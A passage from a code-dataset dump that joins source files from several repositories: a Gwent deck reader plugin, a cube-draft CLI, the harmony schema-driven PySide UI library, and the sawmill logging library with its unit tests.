"data": self.cached_data[card_version][card_name],
}
if (
self.cached_data[card_version][card_name]["category"]
== "Leader"
):
leader = card_data
elif (
self.cached_data[card_version][card_name]["type"] == "stratagem"
):
stratagem = card_data
else:
deck_data.append(card_data)
self.write_cache()
print(
f"Adding Gwent {metadata['name']} (Gwent version {metadata['gwent_version']})"
)
metadata["title"] = metadata["name"]
metadata["slug"] = slugify(
metadata["title"] + "_" + metadata["gwent_version"],
regex_subs=self.settings.get("SLUG_REGEX_SUBSTITUTIONS", []),
)
metadata["description"] = "\n".join(description)
metadata["url"] = f"gwent/{metadata['gwent_version']}/{metadata['slug']}/"
metadata["save_as"] = f"{metadata['url']}index.html"
parsed = {
"provisions": 0,
"units": 0,
"scraps": 0,
"cards": sum([c["count"] for c in deck_data]),
}
for card in deck_data + [stratagem]:
parsed["provisions"] += card["data"]["provision"] * card["count"]
if card["data"]["type"] == "unit":
parsed["units"] += card["count"]
if card["data"]["rarity"] == "legendary":
parsed["scraps"] += 800 * card["count"]
elif card["data"]["rarity"] == "epic":
parsed["scraps"] += 200 * card["count"]
elif card["data"]["rarity"] == "rare":
parsed["scraps"] += 80 * card["count"]
else:
parsed["scraps"] += 30 * card["count"]
for key, value in metadata.items():
parsed[key] = self.process_metadata(key, value)
parsed["deck"] = deck_data
parsed["leader"] = leader
parsed["stratagem"] = stratagem
parsed["stats"] = {
"provisions": [],
"cumulative_provisions": [],
"card_colors": [],
"labels": [],
}
for card in sorted(deck_data, key=lambda x: x["data"]["provision"]):
for _ in range(card["count"]):
parsed["stats"]["provisions"].append(int(card["data"]["provision"]))
parsed["stats"]["card_colors"].append(card["data"]["color"])
parsed["stats"]["labels"].append(card["data"]["name"])
parsed["stats"]["cumulative_provisions"] = list(
accumulate(parsed["stats"]["provisions"])
)
return "", parsed
def add_reader(readers):
readers.reader_classes["gwent"] = GwentReader
def register():
signals.readers_init.connect(add_reader)
``` |
{
"source": "4dcu-be/WinstonCubeSim",
"score": 3
} |
#### File: 4dcu-be/WinstonCubeSim/main.py
```python
from cubedata import RichCubeData as CubeData
import click
@click.command()
@click.option("--url", is_flag=True)
@click.argument("path", required=True, type=str)
def run(path, url):
cube_data = CubeData(draft_size=90)
if url:
cube_data.read_cube_url(path)
else:
cube_data.read_cube_csv(path)
cube_data.start_game()
if __name__ == "__main__":
run()
``` |
{
"source": "4degrees/harmony",
"score": 2
} |
#### File: harmony/schema/collection.py
```python
from ..error import SchemaConflictError
class Collection(object):
'''Store registered schemas.'''
def __init__(self, schemas=None):
'''Initialise collection with *schemas*.'''
self._schemas = {}
if schemas is not None:
for schema in schemas:
self.add(schema)
def add(self, schema):
'''Add *schema*.
Raise SchemaConflictError if a schema with the same id already exists.
'''
schema_id = schema['id']
try:
self.get(schema_id)
except KeyError:
self._schemas[schema_id] = schema
else:
raise SchemaConflictError('A schema is already registered with '
'id {0}'.format(schema_id))
def remove(self, schema_id):
'''Remove a schema with *schema_id*.'''
try:
self._schemas.pop(schema_id)
except KeyError:
raise KeyError('No schema found with id {0}'.format(schema_id))
def clear(self):
'''Remove all registered schemas.'''
self._schemas.clear()
def get(self, schema_id):
'''Return schema registered with *schema_id*.
Raise KeyError if no schema with *schema_id* registered.
'''
try:
schema = self._schemas[schema_id]
except KeyError:
raise KeyError('No schema found with id {0}'.format(schema_id))
else:
return schema
def items(self):
'''Yield (id, schema) pairs.'''
for schema in self:
yield (schema['id'], schema)
def __iter__(self):
'''Iterate over registered schemas.'''
for schema_id in self._schemas:
yield self.get(schema_id)
```
#### File: harmony/ui/error_tree.py
```python
from collections import Mapping
import jsonpointer
class ErrorTree(Mapping):
'''Convert a list of error objects to a tree structure.'''
def __init__(self, errors):
'''Initialise tree from *errors* list.'''
tree = {}
for error in sorted(
errors, key=lambda item: len(list(item.path)),
reverse=True
):
branch = tree
path = list(error.path)
path.insert(0, '__root__')
if error.validator == 'required':
# Required is set one level above so have to retrieve final
# path segment.
schema_path = '/' + '/'.join(map(str, error.schema_path))
segment = jsonpointer.resolve_pointer(
error.schema, schema_path
)
path.append(segment)
for segment in path[:-1]:
branch = branch.setdefault(segment, {})
if path[-1] in branch and isinstance(branch[path[-1]], Mapping):
branch[path[-1]]['__self__'] = error.message
else:
branch[path[-1]] = error.message
self._tree = tree.get('__root__', {})
def __getitem__(self, key):
'''Return item for *key*.'''
return self._tree[key]
def __len__(self):
'''Return number of keys at root of tree.'''
return len(self._tree)
def __iter__(self):
'''Return iterator over tree.'''
return iter(self._tree)
```
#### File: ui/model/string_list.py
```python
from PySide import QtGui, QtCore
from . import HARMONY_DATA_ROLE
class StringList(QtGui.QStringListModel):
'''Manage a list of strings.'''
def data(self, index, role):
'''Return data for *role* at *index*.'''
if role == HARMONY_DATA_ROLE:
role = QtCore.Qt.DisplayRole
return super(StringList, self).data(index, role)
def match(self, start, role, value, hits=1, flags=None):
'''Return indexes that match *value* for *role*.'''
if role == HARMONY_DATA_ROLE:
role = QtCore.Qt.DisplayRole
return super(StringList, self).match(
start, role, value, hits, flags
)
```
#### File: ui/widget/base.py
```python
from PySide import QtGui, QtCore
class Widget(QtGui.QFrame):
'''Base widget.
Subclass to create widgets that reflect specific schema fragments.
'''
# Emit when value changes.
valueChanged = QtCore.Signal()
def __init__(self, title=None, description=None, required=False,
parent=None):
'''Initialise widget with *parent*.'''
super(Widget, self).__init__(parent=parent)
self._title = title
self._description = description
self._required = required
self._error = None
self._construct()
self._postConstruction()
def _construct(self):
'''Construct widget.'''
self._errorIndicator = QtGui.QLabel()
def _postConstruction(self):
'''Perform post-construction operations.'''
self.setTitle(self._title)
self.setDescription(self._description)
self.setRequired(self._required)
self.setError('')
def _emitValueChanged(self, *args, **kw):
'''Emit valueChanged signal.
Subclasses should call this to notify system that the value has changed
either programmatically or as a result of user input.
'''
self.valueChanged.emit()
def title(self):
'''Return title value as stored in widget.'''
return self._title
def setTitle(self, value):
'''Set title to *value*.'''
self._title = value
def description(self):
'''Return description value as stored in widget.'''
return self._description
def setDescription(self, value):
'''Set description to *value*.'''
self._description = value
def required(self):
'''Return current required status.'''
return self._required
def setRequired(self, value):
'''Set required status to boolean *value*.'''
self._required = value
def error(self):
'''Return current error value.'''
return self._error
def setError(self, value):
'''Set error to *value*.'''
self._error = value
if value:
self._errorIndicator.setPixmap(QtGui.QPixmap(':harmony/icon/error'))
if isinstance(value, basestring):
self._errorIndicator.setToolTip(value)
elif isinstance(value, dict):
error = 'The follow validation errors occured:\n * '
error += '\n * '.join(sorted(value.values()))
self._errorIndicator.setToolTip(error)
else:
self._errorIndicator.setToolTip('A validation error occurred.')
else:
self._errorIndicator.setPixmap(QtGui.QPixmap(':harmony/icon/blank'))
self._errorIndicator.setToolTip('')
def value(self):
'''Return current value.
Return None if value should be considered as not set.
'''
raise NotImplementedError()
def setValue(self, value):
'''Set current *value*.'''
raise NotImplementedError()
```
#### File: ui/widget/boolean.py
```python
from PySide import QtGui
from .simple import Simple
class Boolean(Simple):
'''Boolean control.'''
def _construct(self):
'''Construct widget.'''
super(Boolean, self)._construct()
self.layout().setStretchFactor(self._control, 0)
self.layout().addStretch(1)
def _constructControl(self):
'''Return the control widget.'''
return QtGui.QCheckBox()
def _postConstruction(self):
'''Perform post-construction operations.'''
super(Boolean, self)._postConstruction()
self._control.stateChanged.connect(self._emitValueChanged)
def value(self):
'''Return current value.'''
return self._control.isChecked()
def setValue(self, value):
'''Set current *value*.'''
if value is None:
value = False
self._control.setChecked(value)
```
#### File: ui/widget/factory.py
```python
from functools import partial
from .container import Container
from .string import String
from .text import Text
from .datetime import DateTime
from .enum import Enum
from .integer import Integer
from .number import Number
from .boolean import Boolean
from .array import Array
from filesystem_path import FilesystemPath
from ..model.templated_dictionary_list import TemplatedDictionaryList
from ..model.string_list import StringList
class Factory(object):
'''Manage constructing widgets for schemas.'''
def __init__(self, session):
'''Initialise factory with *session*.'''
super(Factory, self).__init__()
self.session = session
def __call__(self, schema, options=None):
'''Return an appropriate widget for *schema*.'''
schema_type = schema.get('type')
schema_title = schema.get('title')
schema_description = schema.get('description')
schema_id = schema.get('id', '')
# IDs
if schema_id == 'harmony:/user':
user_model = TemplatedDictionaryList(
'{firstname} {lastname} ({email})',
self._query_users()
)
return Enum(
user_model,
title=schema_title,
description=schema_description
)
elif schema_id.startswith('harmony:/scope'):
scope = schema_id[len('harmony:/scope/'):]
items = self._query_scopes(scope)
return Enum(
TemplatedDictionaryList('{name} ({id})', items),
title=schema_title,
description=schema_description
)
# Primitives
if schema_type == 'object':
# Construct child for each property.
children = []
properties = schema.get('properties', {})
def order(item):
'''Order item by 'order' key else by name.'''
return item[1].get('order', item[0])
required = schema.get('required')
hide = ['harmony_type']
disable = []
for name, subschema in sorted(properties.items(), key=order):
child_widget = self(subschema, options=options)
if name in required:
child_widget.setRequired(True)
if name in hide:
child_widget.setHidden(True)
if name in disable:
child_widget.setDisabled(True)
children.append({'name': name, 'widget': child_widget})
# Determine columns in layout.
columns = 1
if (schema_id in ('harmony:/user', 'harmony:/resolution')):
columns = 2
widget = Container(
title=schema_title,
description=schema_description,
children=children,
columns=columns
)
if schema_id.startswith('harmony:/domain'):
# Watch for changes to each child of the domain (assumed to be
# scope) and update other children as appropriate.
for child in widget.children:
if isinstance(child['widget'], Enum):
child['widget'].valueChanged.connect(
partial(
self.onDomainChanged, child['widget'], widget
)
)
return widget
if schema_type == 'array':
items = schema.get('items', [])
if isinstance(items, dict):
additional_item = items
items = []
else:
additional_item = schema.get('additionalItems', None)
types = []
for subschema in items:
types.append({
'constructor': partial(self, subschema, options=options),
'value': self.session.instantiate(subschema)
})
additional_type = None
if additional_item is not None:
additional_type = {
'constructor': partial(self, additional_item,
options=options),
'value': self.session.instantiate(additional_item)
}
return Array(
title=schema_title,
description=schema_description,
types=types,
additionalType=additional_type
)
if schema_type == 'string':
if 'enum' in schema:
return Enum(
title=schema_title,
description=schema_description,
model=StringList(schema['enum'])
)
elif schema.get('format', '') == 'text':
return Text(
title=schema_title,
description=schema_description
)
elif schema.get('format', '') == 'date-time':
return DateTime(
title=schema_title,
description=schema_description
)
elif schema.get('format', '') == 'filesystem-path':
return FilesystemPath(
title=schema_title,
description=schema_description
)
else:
return String(
title=schema_title,
description=schema_description
)
if schema_type == 'integer':
return Integer(
title=schema_title,
description=schema_description,
minimum=schema.get('minimum'),
maximum=schema.get('maximum')
)
if schema_type == 'number':
return Number(
title=schema_title,
description=schema_description,
minimum=schema.get('minimum'),
maximum=schema.get('maximum')
)
if schema_type == 'boolean':
return Boolean(
title=schema_title,
description=schema_description
)
raise ValueError('No widget able to represent schema: {0}'
.format(schema))
def _query_users(self):
'''Return a list of valid users.
Subclasses should override this to query their user provider.
The return value should be a list of 'harmony:/user' instances.
'''
return []
def _query_scopes(self, scope, domain=None):
'''Return list of entries for *scope* using *domain*.
Subclasses should override this to query their scope provider.
The return value should be a list of 'harmony:/scope/*' instances.
'''
return []
def onDomainChanged(self, sender, container):
'''Update scope widgets based on domain.
*sender* is the scope widget whose value has changed.
*container* is the domain container widget that holds the scope
widgets.
'''
domain = container.value()
if domain is None:
domain = {}
children_by_name = {}
for child in container.children:
children_by_name[child['name']] = child['widget']
show = children_by_name.get('show')
scene = children_by_name.get('scene')
shot = children_by_name.get('shot')
dependants = ()
if sender == show:
dependants = ('scene', 'shot', 'asset')
elif sender == scene:
dependants = ('shot', 'asset')
elif sender == shot:
dependants = ('asset',)
for scope in dependants:
widget = children_by_name.get(scope)
if widget is not None:
widget.setModel(
TemplatedDictionaryList(
'{name} ({id})', self._query_scopes(scope, domain)
)
)
break
```
#### File: ui/widget/simple.py
```python
from .standard import Standard
class Simple(Standard):
'''Simple widget that wraps a single control.'''
def _construct(self):
'''Construct widget.'''
super(Simple, self)._construct()
self._control = self._constructControl()
self._headerLayout.insertWidget(1, self._control, stretch=1)
def _constructControl(self):
'''Return the control widget.
Subclasses should override this to return an appropriate control
widget.
'''
raise NotImplementedError()
```
#### File: ui/widget/string.py
```python
from PySide import QtGui
from .simple import Simple
class String(Simple):
'''Single line text based input.'''
def _constructControl(self):
'''Return the control widget.'''
control = QtGui.QLineEdit()
return control
def _postConstruction(self):
'''Perform post-construction operations.'''
super(String, self)._postConstruction()
self._control.textChanged.connect(self._emitValueChanged)
def value(self):
'''Return current value.'''
value = self._control.text()
value = value.strip()
if not value:
value = None
return value
def setValue(self, value):
'''Set current *value*.'''
self._control.setText(value)
```
#### File: ui/widget/text.py
```python
from PySide import QtGui, QtCore
from .string import String
class Text(String):
'''Multiple line text based input.'''
def _construct(self):
'''Construct widget.'''
super(Text, self)._construct()
self._titleLabel.setAlignment(
QtCore.Qt.AlignRight | QtCore.Qt.AlignTop
)
def _constructControl(self):
'''Return the control widget.'''
control = TextEdit()
# Default to 5 lines high.
# TODO: Make this configurable?
font_metrics = QtGui.QFontMetrics(control.font())
control.setFixedHeight((font_metrics.lineSpacing() * 5) + 10)
return control
class TextEdit(QtGui.QPlainTextEdit):
'''Text edit with support for placeholder text.'''
def __init__(self, *args, **kw):
'''Initialise text edit.'''
self._placeholderText = ''
super(TextEdit, self).__init__(*args, **kw)
self.setTabChangesFocus(True)
def placeholderText(self):
'''Return placeholder text.'''
return self._placeholderText
def setPlaceholderText(self, value):
'''Set placeholder text to *value*.'''
self._placeholderText = value
def text(self):
'''Return current text.'''
return self.toPlainText()
def setText(self, value):
'''Set text to *value*.'''
self.setPlainText(value)
def focusInEvent(self, event):
'''Handle focus in event.'''
super(TextEdit, self).focusInEvent(event)
self.viewport().update()
def focusOutEvent(self, event):
'''Handle focus out event.'''
super(TextEdit, self).focusOutEvent(event)
self.viewport().update()
def paintEvent(self, event):
'''Handle paint *event*.'''
placeholder = self.placeholderText()
if placeholder and not self.toPlainText() and not self.hasFocus():
# Display a placeholder
viewport = self.viewport()
target = viewport.rect()
palette = self.palette()
painter = QtGui.QPainter(viewport)
previous_pen = painter.pen()
color = palette.text().color()
color.setAlpha(128) # 50% of text color
painter.setPen(color)
painter.drawText(
target.adjusted(4, 4, -4, -4), # TODO: How to calculate?
QtCore.Qt.AlignLeft,
placeholder
)
painter.setPen(previous_pen)
painter.end()
super(TextEdit, self).paintEvent(event)
```
#### File: harmony/ui/worker.py
```python
import sys
from PySide import QtCore
class Worker(QtCore.QThread):
'''Perform work in a background thread.'''
def __init__(self, function, args=None, kwargs=None, parent=None):
'''Execute *function* in separate thread.
*args* should be a list of positional arguments and *kwargs* a
mapping of keyword arguments to pass to the function on execution.
Store function call as self.result. If an exception occurs
store as self.error.
Example::
try:
worker = Worker(theQuestion, [42])
worker.start()
while worker.isRunning():
app = QtGui.QApplication.instance()
app.processEvents()
if worker.error:
raise worker.error[1], None, worker.error[2]
except Exception as error:
traceback.print_exc()
QtGui.QMessageBox.critical(
None,
'Error',
'An unhandled error occurred:'
'\n{0}'.format(error)
)
'''
super(Worker, self).__init__(parent=parent)
self.function = function
self.args = args or []
self.kwargs = kwargs or {}
self.result = None
self.error = None
def run(self):
'''Execute function and store result.'''
try:
self.result = self.function(*self.args, **self.kwargs)
except Exception:
self.error = sys.exc_info()
```
#### File: test/interactive/publisher.py
```python
import sys
import time
from functools import partial
from PySide import QtGui
import harmony.session
import harmony.ui.widget.factory
import harmony.ui.error_tree
import harmony.ui.publisher
class Publisher(harmony.ui.publisher.Publisher):
'''Customised publisher.'''
def _publish(self, instance):
'''Perform publish.'''
for index in range(5):
time.sleep(1)
return instance
class Factory(harmony.ui.widget.factory.Factory):
'''Customised widget factory.'''
def __init__(self, *args, **kw):
self.project_tree = {}
for show_key in ('show_a', 'show_b'):
show = self.project_tree.setdefault(show_key, {})
scenes = show['scenes'] = {}
assets = show['assets'] = {}
for scene_key in ('sc001', 'sc002', 'sc003'):
scene = scenes[scene_key] = {}
shots = scene['shots'] = {}
for shot_key in ('001', '002', '003', '004'):
shot = shots[shot_key] = {}
shot['assets'] = {}
if show_key == 'show_a':
for asset_key in ('astronaut', 'space_station'):
assets[asset_key] = {}
elif show_key == 'show_b':
for asset_key in ('dinosaur', 'amber', 'scientist'):
assets[asset_key] = {}
super(Factory, self).__init__(*args, **kw)
def _query_users(self):
'''Return a list of valid users.'''
users = [
{'firstname': 'Martin', 'lastname': 'Pengelly-Phillips',
'email': '<EMAIL>', 'username': 'martin'},
{'firstname': 'Joe', 'lastname': 'Blogs',
'email': '<EMAIL>', 'username': 'joe'}
]
return map(partial(self.session.instantiate, 'harmony:/user'), users)
def _query_scopes(self, scope, domain=None):
'''Return list of entries for *scope* using *domain*.'''
scopes = []
if domain is None:
domain = {}
if scope == 'show':
shows = sorted(self.project_tree.keys())
for show in shows:
scopes.append({
'name': show.replace('_', ' ').title(),
'id': show
})
elif scope == 'scene':
show_id = domain.get('show', {}).get('id')
show = self.project_tree.get(show_id, {})
scenes = sorted(show.get('scenes', {}).keys())
for scene in scenes:
scopes.append({
'name': scene.replace('_', ' ').title(),
'id': scene
})
elif scope == 'shot':
show_id = domain.get('show', {}).get('id')
scene_id = domain.get('scene', {}).get('id')
show = self.project_tree.get(show_id, {})
scenes = show.get('scenes', {})
scene = scenes.get(scene_id, {})
shots = sorted(scene.get('shots', {}).keys())
for shot in shots:
scopes.append({
'name': shot.replace('_', ' ').title(),
'id': shot
})
elif scope == 'asset':
show_id = domain.get('show', {}).get('id')
scene_id = domain.get('scene', {}).get('id')
shot_id = domain.get('shot', {}).get('id')
show = self.project_tree.get(show_id, {})
scenes = show.get('scenes', {})
scene = scenes.get(scene_id, {})
shots = scene.get('shots', {})
shot = shots.get(shot_id)
if shot:
assets = shot.get('assets', {}).keys()
else:
assets = show.get('assets', {}).keys()
for asset in assets:
scopes.append({
'name': asset.replace('_', ' ').title(),
'id': asset
})
return map(
partial(
self.session.instantiate, 'harmony:/scope/{0}'.format(scope)
),
scopes
)
def main(arguments=None):
'''Interactive test of dynamic UI building from schema.'''
if arguments is None:
arguments = sys.argv
application = QtGui.QApplication(arguments)
session = harmony.session.Session()
factory = Factory(session)
dialog = Publisher(session, factory)
dialog.resize(600, 800)
dialog.show()
value = dialog.value()
value['note'] = 'Hello world!'
dialog.setValue(value)
sys.exit(application.exec_())
if __name__ == '__main__':
raise SystemExit(main())
``` |
{
"source": "4degrees/mill",
"score": 2
} |
#### File: doc/resource/configurator.py
```python
import sys
import sawmill
import sawmill.handler.stream
import sawmill.handler.email
import sawmill.handler.buffer
import sawmill.formatter.template
import sawmill.formatter.field
import sawmill.filterer.level
import sawmill.filterer.item
def configure(*args, **kw):
'''Example of how to configure logging system.'''
# Output to standard error stream.
stderr_handler = sawmill.handler.stream.Stream(sys.stderr)
stderr_formatter = sawmill.formatter.template.Template('{level}:{message}')
stderr_handler.formatter = stderr_formatter
stderr_filterer = sawmill.filterer.level.Level(min='warning', max=None)
stderr_filterer |= sawmill.filterer.item.Item('user', True)
stderr_handler.filterer = stderr_filterer
sawmill.root.handlers['stderr'] = stderr_handler
# Output to log file
log_path = '/path/to/logfile.log'
file_stream = open(log_path, 'a')
file_handler = sawmill.handler.stream.Stream(file_stream)
file_formatter = sawmill.formatter.field.Field([
'timestamp', 'level', 'name', 'message', '*'
])
file_handler.formatter = file_formatter
sawmill.root.handlers['file'] = file_handler
# Send email on errors.
email_handler = sawmill.handler.email.Email(
'Error Report',
'<EMAIL>',
'<EMAIL>'
)
def check_for_error(logs, buffer):
'''Return True if any of the recent logs was an error message.'''
for log in logs:
if log.get('level') == 'error':
return True
return False
email_buffer_handler = sawmill.handler.buffer.Buffer(
email_handler,
check_for_error,
limit=30
)
sawmill.root.handlers['email'] = email_buffer_handler
```
#### File: sawmill/configurator/classic.py
```python
import sys
import tempfile
from datetime import datetime
import sawmill
from sawmill.handler.stream import Stream
from sawmill.filterer.level import Level
from sawmill.formatter.field import Field
def configure(level='info', filepath=None, *args, **kw):
'''Configure the logging system in a classic manner.
*level* will determine the minimum level to display on stderr. *filepath*
can be used to set where the log file should be stored. It defaults to a
temporary file named after the current date and time.
'''
stderr_handler = Stream(
sys.stderr,
filterer=Level(min=level, max=None),
formatter=Field(keys=['level', 'name', 'message', 'traceback'],
template='{value}')
)
sawmill.root.handlers['stderr'] = stderr_handler
if filepath is None:
prefix = datetime.now().strftime('sawmill-%Y_%m_%d-%H_%M_%S-')
_, filepath = tempfile.mkstemp(prefix=prefix, suffix='.log')
file_descriptor = open(filepath, 'a')
file_handler = Stream(
file_descriptor,
filterer=Level(min=None, max=None),
formatter=Field(keys=['timestamp', 'level', 'name', 'message',
'traceback'])
)
sawmill.root.handlers['file'] = file_handler
```
#### File: sawmill/formatter/template.py
```python
import string
from .base import Formatter
class Template(Formatter, string.Formatter):
'''Format :py:class:`logs<sawmill.log.Log>` according to a template.'''
ERROR = ('__ERROR__')
def __init__(self, template, missing_key=''):
'''Initialise formatter with *template*.
*missing_key* determines how to handle a missing key when formatting a
log. If set to :py:attr:`ERROR` then an error will be raised for any
key referenced in the template that is missing from the log. Any other
value will be used as the substitute for the missing value. The default
is an empty string.
.. note::
The template is applied once per processed log.
'''
super(Template, self).__init__()
self.template = template
self.missing_key = missing_key
def format(self, logs):
'''Return formatted data representing *log*.'''
data = []
for log in logs:
data.append(self.vformat(self.template, (), log))
return data
def get_field(self, field_name, args, kwargs):
'''Convert and return *field_name* to an object to be formatted.
.. note::
Based on Python's string.Formatter.get_field source.
'''
first, rest = field_name._formatter_field_name_split()
try:
obj = self.get_value(first, args, kwargs)
for is_attr, index in rest:
if is_attr:
obj = getattr(obj, index)
else:
obj = obj[index]
except Exception:
if self.missing_key == self.ERROR:
raise
else:
return self.missing_key, first
return obj, first
```
#### File: sawmill/logger/dynamic.py
```python
import collections
from .base import Logger
class Dynamic(Logger):
'''Dynamic logger allowing delayed computation of values.'''
def __getitem__(self, key):
'''Return value referenced by *key*.
If the value is a callable, then call it and return the result. In
addition store the computed result for future use.
'''
value = self._mapping[key]
if isinstance(value, collections.Callable):
self[key] = value = value()
return value
```
#### File: source/sawmill/log.py
```python
import copy
from collections import MutableMapping
class Log(
MutableMapping,
dict # dict is required as some third-party packages, such as pystache,
# test using isinstance against dict.
# Issue registered at https://github.com/defunkt/pystache/issues/185
):
'''Hold individual log data.'''
def __init__(self, *args, **kw):
'''Initialise log.'''
super(Log, self).__init__()
self._mapping = dict(*args, **kw)
def clone(self):
'''Return a clone of this log.
This is a mixture of shallow and deep copies where the log instance
and its attributes are shallow copied, but the actual mapping (items)
are deepcopied.
'''
log = copy.copy(self)
log._mapping = copy.deepcopy(self._mapping)
return log
def __repr__(self):
'''Return unambiguous representation.'''
return '{0}({1!r})'.format(self.__class__.__name__, self._mapping)
def __str__(self):
'''Return string representation.'''
return str(self._mapping)
def __len__(self):
'''Return number of keys.'''
return len(self._mapping)
def __iter__(self):
'''Return iterator over object.'''
return iter(self._mapping)
def __getitem__(self, key):
'''Return value referenced by *key*.'''
return self._mapping[key]
def __setitem__(self, key, value):
'''Set *key* to reference *value*.'''
self._mapping[key] = value
def __delitem__(self, key):
'''Remove *key* reference.'''
del self._mapping[key]
def __hash__(self):
'''Return hash of mapping.'''
return hash(frozenset(self._mapping.iteritems()))
```
#### File: unit/configurator/test_classic.py
```python
from contextlib import nested
from StringIO import StringIO
import mock
import sawmill
import sawmill.log
from sawmill.configurator import classic
def test_classic_configurator_with_no_options():
'''Test classic configurator when passed no options.'''
with nested(
mock.patch('sys.stderr', new_callable=StringIO),
mock.patch.dict(sawmill.root.handlers, clear=True)
) as (stderr, handlers):
assert len(sawmill.root.handlers) == 0
# Check handlers added under expected keys
classic.configure()
assert sorted(sawmill.root.handlers.keys()) == ['file', 'stderr']
# Check stderr handler
assert stderr.getvalue() == ''
log = sawmill.log.Log(message='Test configurator')
sawmill.root.handle(log)
assert stderr.getvalue() == 'Test configurator\n'
stderr.truncate(0)
log = sawmill.log.Log(message='Test configurator', level='debug')
sawmill.root.handle(log)
assert stderr.getvalue() == ''
# Check file handler
sawmill.root.handlers['file'].flush()
filepath = sawmill.root.handlers['file'].stream.name
with open(filepath, 'r') as file:
contents = file.read()
expected = (
'message=Test configurator\n'
'level=debug:message=Test configurator\n'
)
assert contents == expected
```
#### File: unit/filterer/test_item.py
```python
from sawmill.log import Log
from sawmill.filterer.item import Item
def test_missing_key_passes_when_mode_is_exclude():
'''Test log record with missing key passes when mode is exclude.'''
log = Log()
filterer = Item('name', 'sawmill.test', mode=Item.EXCLUDE)
assert filterer.filter([log]) == [log]
def test_missing_key_fails_when_mode_is_include():
'''Test log record with missing key fails when mode is include.'''
log = Log()
filterer = Item('name', 'sawmill.test', mode=Item.INCLUDE)
assert filterer.filter([log]) == []
def test_include_mode():
'''Test only logs with matching key, value pass when mode is INCLUDE.'''
filterer = Item('name', 'sawmill.test.one', mode=Item.INCLUDE)
log = Log(name='sawmill.test.one')
assert filterer.filter([log]) == [log]
log = Log(name='sawmill.test.two')
assert filterer.filter([log]) == []
def test_exclude_mode():
'''Test only logs without matching key, value pass when mode is EXCLUDE.'''
filterer = Item('name', 'sawmill.test.one', mode=Item.EXCLUDE)
log = Log(name='sawmill.test.one')
assert filterer.filter([log]) == []
log = Log(name='sawmill.test.two')
assert filterer.filter([log]) == [log]
```
#### File: unit/filterer/test_level.py
```python
import pytest
from sawmill.log import Log
from sawmill.filterer.level import Level
def pytest_funcarg__levels(request):
'''Return levels.'''
return [
'debug',
'info',
'warning',
'error'
]
def test_no_level_present(levels):
'''Test log record with no level information passes.'''
log = Log()
filterer = Level(levels=levels)
assert filterer.filter([log]) == [log]
def test_invalid_level(levels):
'''Test invalid level on log passes filter.'''
log = Log(level='invalid_level')
filterer = Level(levels=levels)
assert filterer.filter([log]) == [log]
def test_invalid_min_level(levels):
'''Test invalid min level on filterer raises ValueError.'''
log = Log(level='info')
filterer = Level(min='invalid_level', levels=levels)
with pytest.raises(ValueError):
filterer.filter([log])
def test_invalid_max_level(levels):
'''Test invalid max level on filterer raises ValueError.'''
log = Log(level='info')
filterer = Level(max='invalid_level', levels=levels)
with pytest.raises(ValueError):
filterer.filter([log])
def test_filter_below_min_level(levels):
'''Test log with level below min does not pass.'''
log = Log(level='info')
filterer = Level(min='warning', levels=levels)
assert filterer.filter([log]) == []
def test_filter_above_max_level(levels):
'''Test log with level above max does not pass.'''
log = Log(level='error')
filterer = Level(max='warning', levels=levels)
assert filterer.filter([log]) == []
def test_against_limitless_range(levels):
'''Test log passes against a limitless range.'''
log = Log(level='info')
filterer = Level(min=None, max=None, levels=levels)
assert filterer.filter([log]) == [log]
```
#### File: unit/formatter/test_email.py
```python
from email.message import Message
import pytest
from sawmill.log import Log
from sawmill.formatter.email import Email
def test_format():
'''Test formatted log result is as expected.'''
log = Log(
timestamp=123456789,
name='test.log',
message='A message',
level='info'
)
template = Email('Test', '<EMAIL>', '<EMAIL>')
data = template.format([log])
assert len(data) == 1
datum = data[0]
assert isinstance(datum, Message)
assert datum['Subject'] == 'Test'
assert datum['From'] == '<EMAIL>'
assert datum['To'] == '<EMAIL>'
assert datum.is_multipart() is True
html = datum.get_payload(1)
assert html.get_payload() == '''
<html>
<body>
<h1>Logs</h1>
<span class='info'>
123456789:test.log:A message
</span><br/>
</body>
</html>
'''
text = datum.get_payload(0)
assert text.get_payload() == '''# Logs
123456789:test.log:A message
'''
@pytest.mark.parametrize(('key', 'value'), [
('subject', 'A Test'),
('sender', '<EMAIL>'),
('recipients', '<EMAIL>')
])
def test_callable(key, value):
'''Test callable'''
kwargs = {
'subject': 'Test',
'sender': '<EMAIL>',
'recipients': '<EMAIL>'
}
kwargs[key] = lambda logs: value
template = Email(**kwargs)
log = Log()
data = template.format([log])
assert len(data) == 1
datum = data[0]
mapping = {
'subject': 'Subject',
'sender': 'From',
'recipients': 'To'
}
assert datum[mapping[key]] == value
```
#### File: unit/formatter/test_field.py
```python
import pytest
from sawmill.log import Log
from sawmill.formatter.field import Field
def test_format():
'''Test formatted log result is as expected.'''
log = Log(message='A message', level='info')
template = Field(keys=['level', 'message'])
assert template.format([log]) == ['level=info:message=A message\n']
def test_alternative_template():
'''Test configuring the template.'''
log = Log(message='A message')
template = Field(keys=['level', 'message'], template='{value}')
assert template.format([log]) == ['A message\n']
def test_alternative_separator():
'''Test configuring the separator'''
log = Log(message='A message', level='info')
template = Field(keys=['level', 'message'], item_separator=', ')
assert template.format([log]) == ['level=info, message=A message\n']
def test_missing_key_set_to_skip():
'''Test missing values skipped when missing_key set to SKIP.'''
log = Log(message='A message')
template = Field(keys=['level', 'message'], missing_key=Field.SKIP)
assert template.format([log]) == ['message=A message\n']
def test_missing_key_set_to_substitute():
'''Test missing values replaced when missing_key set to a substitute.'''
log = Log(message='A message')
template = Field(keys=['level', 'message'], missing_key='NOT_SET')
assert template.format([log]) == ['level=NOT_SET:message=A message\n']
def test_missing_key_set_to_error():
'''Test missing values raise KeyError when missing_key set to ERROR.'''
log = Log(message='A message')
template = Field(keys=['level', 'message'], missing_key=Field.ERROR)
with pytest.raises(KeyError):
template.format([log])
@pytest.mark.parametrize(('keys', 'expected'), [
(['*', 'level', 'message'], ['a=3:b=2:z=1:level=info:message=A message\n']),
(['level', '*', 'message'], ['level=info:a=3:b=2:z=1:message=A message\n']),
(['level', 'message', '*'], ['level=info:message=A message:a=3:b=2:z=1\n']),
(['*'], ['a=3:b=2:level=info:message=A message:z=1\n']),
(['*', '*'], (['a=3:b=2:level=info:message=A message:z=1:'
'a=3:b=2:level=info:message=A message:z=1\n']))
])
def test_include_remaining_keys(keys, expected):
'''Test using '*' to include remaining keys in alphabetical order.'''
log = Log(level='info', message='A message', a=3, b=2, z=1)
template = Field(keys=keys)
assert template.format([log]) == expected
``` |
{
"source": "4degrees/segue",
"score": 3
} |
#### File: segue/backend/pickle_support.py
```python
import copy_reg
import types
